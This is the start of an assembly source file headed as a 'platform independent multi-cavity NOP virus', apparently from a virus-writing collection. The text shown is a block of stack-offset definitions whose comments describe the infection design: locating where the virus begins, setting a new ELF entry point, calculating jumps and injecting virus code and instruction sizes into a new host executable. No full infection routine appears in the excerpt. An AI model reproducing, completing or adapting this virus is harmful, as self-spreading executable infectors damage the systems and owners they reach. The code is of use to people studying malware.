RECON06 . A PLATFORM INDEPENDENT MULTI-CAVITY NOP VIRUS

  .equ last, -0x58
  .equ lastJA, -0x5c       # the address of the operand of the last jump instruction
  .equ vstart, -0x60       # where the virus begins, and where the new e_entry should be
  .equ new_e_entry, -0x64  # 'new' as in new host
  .equ newjmp_loc, -0x68   # for forward/backward jump calculations
  .equ oldjmp_loc, -0x6c
  .equ jmp_dist, -0x74
  .equ oldopcode_pos, -0x78
  .equ oldopcode, -0x7c
  .equ newopcode_pos, -0x80
  .equ newopcode, -0x84
  .equ oldsizes_parity, -0x88
  .equ oldsizes_pos, -0x8c
  .equ oldsizes_cur, -0x90
  .equ oldsizes, -0x94
  .equ newsizes_pos, -0x98
  .equ newsizes_parity, -0x9c
  .equ newsizes_cur, -0xa0
  .equ name, -0x1a0
  .equ newsizes, -0x600  # From the old infected executable, we copy the instruction sizes
			 #  to this allocation and later inser them into the new executable 
			 #  one by one, just like we inject virus code.